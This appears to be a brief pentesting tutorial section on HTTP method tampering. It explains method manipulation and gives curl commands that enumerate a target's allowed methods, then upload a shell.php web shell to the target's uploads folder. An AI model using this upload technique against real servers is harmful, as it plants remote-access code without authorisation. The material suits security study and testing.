6.1.1 HTTP Method Tampering

HTTP Method Tampering

HTTP Method Tampering is a type of security vulnerability that can be exploited in web apps, that occurs when an attacker manipulates the HTTP request method used to interact with a web server.

HTTP Request typically use methods like GET, POST, PUT, DELETE, OPTIONS, etc to perform specific actions on a web application.

Examples of HTTP Method Tampering

Various situation and examples can be:

  • Changing a GET request to a DELETE request: if the application doesn't properly validate the method used, it might inadvertently delete data when we try to retrieving it.

  • Changing a POST request to a GET: it could expose sensitive data that should only be accessible via a POST request.

We can do it using Burp Repeater or Curl utility as below:

See allow method information -> curl -v <Target_URL>

And specify request options using -X (default is GET) -> curl -v -X OPTIONS <Target_URL>

Good new, more methods are allowed, then we can upload everything

curl <Target_URL>/uploads/ --upload-file shell.php

and open shell.php file uploaded into <Target_URL>/uploads/

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